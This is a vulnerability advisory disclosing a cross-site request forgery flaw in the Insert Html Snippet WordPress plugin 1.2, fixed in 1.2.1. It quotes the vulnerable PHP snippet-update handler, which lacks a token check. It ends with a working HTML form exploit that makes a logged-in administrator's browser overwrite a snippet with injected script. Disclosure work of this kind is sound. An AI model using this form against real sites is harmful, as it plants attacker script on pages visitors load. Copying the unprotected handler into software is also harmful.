OVE ID
OVE-20160724-0027
Abstract
It was discovered that the Insert Html Snippet WordPress Plugin is vulnerable to Cross-Site Request Forgery. Amongst others, this issue can be used to update an existing HTML snippet. This can be used to insert arbitrary HTML and scripting code within a post or page that uses the snippet. In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website.
Tested versions
This issue was successfully tested on Insert Html Snippet WordPress Plugin version 1.2.
Fix
This issue has been addressed in Insert Html Snippet version 1.2.1.
Introduction
Insert Html Snippet is a plugin for WordPress that allows you to add HTML, CSS and javascript code to your pages and posts easily using shortcodes. It was discovered that the Insert Html Snippet WordPress Plugin is vulnerable to Cross-Site Request Forgery. Amongst others, this issue can be used to update an existing HTML snippet. This can be used to insert arbitrary HTML and scripting code within a post or page that uses the snippet.
Details
This issue exists because Insert Html Snippet lacks protection against Cross-Site Request Forgery attacks. See for example the code that is used to edit a snippet.
if(isset($_POST) && isset($_POST['updateSubmit'])){
	
// 		echo '<pre>';
// 		print_r($_POST);
// 		die("JJJ");
	$_POST = stripslashes_deep($_POST);
	$_POST = xyz_trim_deep($_POST);
	
	$xyz_ihs_snippetId = $_GET['snippetId'];
	
	$temp_xyz_ihs_title = str_replace(' ', '', $_POST['snippetTitle']);
	$temp_xyz_ihs_title = str_replace('-', '', $temp_xyz_ihs_title);
	
	$xyz_ihs_title = str_replace(' ', '-', $_POST['snippetTitle']);
	$xyz_ihs_content = $_POST['snippetContent'];
	
	if($xyz_ihs_title != "" && $xyz_ihs_content != ""){
	
		if(ctype_alnum($temp_xyz_ihs_title))
		{
		$snippet_count = $wpdb->query($wpdb->prepare( 'SELECT * FROM '.$wpdb->prefix.'xyz_ihs_short_code WHERE id!=%d AND title=%s LIMIT 0,1',$xyz_ihs_snippetId,$xyz_ihs_title)) ;
	
		if($snippet_count == 0){
			$xyz_shortCode = '[xyz-ihs snippet="'.$xyz_ihs_title.'"]';
	
			**$wpdb->update($wpdb->prefix.'xyz_ihs_short_code', array('title'=>$xyz_ihs_title,'content'=>$xyz_ihs_content,'short_code'=>$xyz_shortCode,), array('id'=>$xyz_ihs_snippetId));**
In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website.
Proof of concept
<html>
	<body>
		<form action="http://<target>/wp-admin/admin.php?page=insert-html-snippet-manage&action=snippet-edit&snippetId=1&pageno=1" method="POST">
			<input type="hidden" name="snippetId" value="1" />
			<input type="hidden" name="snippetTitle" value="Fu" />
			<input type="hidden" name="snippetContent" value="<script>alert(1);</script>" />
			<input type="hidden" name="updateSubmit" value="Update" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>